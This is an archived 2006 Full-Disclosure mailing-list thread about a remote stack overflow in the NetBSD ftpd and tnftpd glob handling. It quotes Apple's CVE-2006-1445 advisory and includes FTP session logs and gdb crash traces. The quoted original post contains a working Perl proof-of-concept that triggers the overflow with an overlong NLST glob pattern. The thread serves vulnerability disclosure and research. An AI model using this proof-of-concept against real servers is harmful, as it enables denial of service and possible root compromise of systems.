lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Thu, 30 Nov 2006 20:17:23 -0500
From: "K F (lists)" <>
Subject: Re: NetBSD FTPD and ports ***REMOTE ROOOOOT

I can confirm that this bug is present on OSX 10.3.9 at the very least. 
lukemftpd-20040810 is the version this was tested against.
I am fairly sure that this issue was patched recently in:

Security Update 2006-003



      CVE-ID: CVE-2006-1445

      Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X
      v10.4.6, Mac OS X Server v10.4.6

      Impact: FTP operations by authenticated FTP users may lead to
      arbitrary code execution

      Description: Multiple issues in FTP server path name handling
      could result in a buffer overflow. A malicious authenticated user
      may be able to trigger this overflow which may lead to arbitrary
      code execution with the privileges of the FTP server. This update
      adresses the issue by properly handling the boundary conditions.

ftp> o localhost
Trying ::1...
Connected to localhost.
220 localhost FTP server (tnftpd 20040810) ready.
Name (localhost:kevinf):
331 Password required for kevinf.
    Welcome to Darwin!
230 User kevinf logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> mkdir 
File exists.
ftp> ls 
229 Entering Extended Passive Mode (|||49225|)

421 Service not available, remote server timed out. Connection closed

kevin-fs-Computer:/cores kevinf$ sudo gdb -q /usr/libexec/ftpd 425
Reading symbols for shared libraries ... done
/cores/425: No such file or directory.
Attaching to program: `/usr/libexec/ftpd', process 425.
Reading symbols for shared libraries ........... done
0x9000ed44 in read ()
(gdb) c

Program received signal EXC_BAD_ACCESS, Could not access memory.
0x00410040 in ?? ()
(gdb) bt
#0  0x00410040 in ?? ()
Cannot access memory at address 0x410040
Cannot access memory at address 0x410041
#1  0x00000000 in ?? ()

kevin-fs-Computer:/Volumes/HARD DISK kevinf$ ps -aux 
-ocommand,svuid,svgid,ruid,rgid,uid,gid | grep ftpd
kevinf     425   0.0  0.3    28072    820  ??  SXs   8:02PM   
0:00.05     0     0     0     0   501   501 ftpd -l

This could be fun on x86 machines.... good luck on powerpc howerver.

Thanks for the excuse to finish my OSX Unicode research!


kcope wrote:
> LAMERZ!!!!!
> Greetings to the elite guys, thank you for your time.
> signed,
> ***eliteboy***
> $$$ NetBSD ftpd and ports *Remote ROOOOOT $HOLE$* $$$
> About
> tnftpd is a port of the NetBSD FTP server to other systems.
> It offers many enhancements over the traditional BSD ftpd,
> including per-class configuration directives via ftpd.conf(5),
> RFC 2389 and draft-ietf-ftpext-mlst-11 support, IPv6,
> transfer rate throttling, and more.
> tnftpd was formerly known as lukemftpd,
> and earlier versions are present in Mac OS X 10.2 (as ftpd)
> and FreeBSD 5.0 (as lukemftpd). 
> Description
> The NetBSD ftpd and the tnftpd port suffer from a remote stack overrun,
> which can lead to a root compromise.
> The bug is in glob.c file. The globbing mechanism is flawed as back in
> 2001.
> To trigger the overflow you can create a folder and use the globbing
> special characters (like STARS) to overflow an internal stack based buffer.
> Example PoC:
> ---snip---
> use IO::Socket;
> $sock = IO::Socket::INET->new(PeerAddr => '',
>                               PeerPort => '21',
>                               Proto    => 'tcp');
> $c = "C";
> $a = "C" x 255;
> $d = "A" x 450;
> print $sock "USER kcope\r\n";
> print $sock "PASS remoteroot\r\n";
> $x = <stdin>;
> print $sock "MKD $a\r\n";
> print $sock "NLST C*/../C*/../C*/../$d\r\n";
> print $sock "QUIT\r\n";
> while (<$sock>) {
> 	print;	
> }
> ---snip---
> gdb output tested on NetBSD 3.0 i386 NetBSD-ftpd 20050303 :
> (gdb) c
> Continuing.
> Program received signal SIGSEGV, Segmentation fault.
> 0x00410041 in ?? ()
> (gdb)
> tnftpd-20040810 behaves similar.
> FreeBSD (lukemftpd) and MacOSX (ftpd) were not tested,
> however they could have the same bug, because of the same
> codebase.
> The problem when exploiting this kind of bug is,
> that we can only control 0x00410041, not the whole
> 32 bit. However it looks feasible to find a way
> to do a hole EIP redirection and/or exploit
> the bug the "unicode" way, which could be especially
> hard on BSD systems.

Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -

Powered by blists - more mailing lists